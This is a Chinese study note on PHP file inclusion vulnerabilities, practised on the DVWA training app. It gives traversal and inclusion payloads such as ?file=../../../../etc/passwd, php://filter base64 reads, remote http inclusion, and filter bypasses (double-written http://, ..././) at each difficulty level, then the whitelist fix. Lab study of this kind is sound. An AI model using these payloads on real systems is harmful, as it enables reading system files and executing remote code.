DVWA-文件包含学习笔记

DVWA-文件包含学习笔记

一、文件包含与漏洞

文件包含:

　　开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。

文件包含漏洞:

　　开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞。

二、文件包含漏洞用到的函数

require:找不到被包含的文件，报错，并且停止运行脚本。

include:找不到被包含的文件,只会报错，但会继续运行脚本。

require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。

include_once:与include类似,区别在于当重复调用同一文件时,程序只调用一次。

三、目录遍历与文件包含的区别

　　目录遍历是可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格，针对本系统。

　　文件包含是利用函数来包含web目录以外的文件，分为本地包含和远程包含。

四、文件包含特征

?page=a.php
?home=b.html
?file=content

检测方法

?file=../../../../etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt

五、DVWA练习

1.修改php.ini配置文件开启文件包含功能

allow_url_include = on

　　

将DVWA的级别设置为low

1.分析源码，可以看到没有对page参数做任何过滤

　　

本地文件包含

2.尝试利用文件包含

2.1绝对路径

　　

文件包含时,不管包含的文件是什么类型，都会优先尝试当作php文件执行，如果文件内容有php代码，则会执行php代码并返回代码执行的结果,如果文件内容没有php代码,则把文件内容打印出来

　　

文件内容没有php代码，把文件内容打印(显示)到浏览器页面

　　

2.2相对路径

　　

3.使用php封装协议读取和写入php文件

3.1读取文件

php://filter/read=convert.base64-encode/resource=..././..././..././..././1.txt 访问,可以看到显示了base64编码的内容

　　

使用burpsuit的decode模块解码

　　

3.2写入php文件,下图可以看到输入的内容并返回结果

　　

远程文件包含

1.通过http协议包含本地服务器上的文件

　　

2.通过http协议包含远程服务器上的文件

　　

将DVWA的级别设置为medium

1.分析源码,可以看到使用str_replace函数对http://、https://、../ 、..\进行了过滤,但可以通过双写来绕过，或者使用绝对路径来绕过

　　

2.尝试绕过

先使用http://192.168.10.130/1.txt 抓包分析,可以看到对http://做了过滤

　　

使用双写绕过http://的过滤    htthttp://p://192.168.10.144/1.txt

　　

使用..././..././..././..././..././..././..././ 绕过../的过滤

　　

使用绝对路径绕过

　　

使用file协议绕过

　　

将DVWA的级别设置为High

1.分析源码可以看到,如果$file变量中不含有file并且$file不等于include.php，此时服务器才不会去包含文件，两个条件只要不满足其中任意一个,就能达到文件包含的目的,可以是同file协议来绕过

　　

2.使用file协议绕过

　　

将DVWA的级别设置为Impossible

1.分析源码可以看到,使用白名单,page只能为include.php”、“file1.php”、“file2.php”、“file3.php”之一，只允许包含include.php、file1.php、file2.php、file3.php，不能包含别的文件，彻底杜绝文件包含漏洞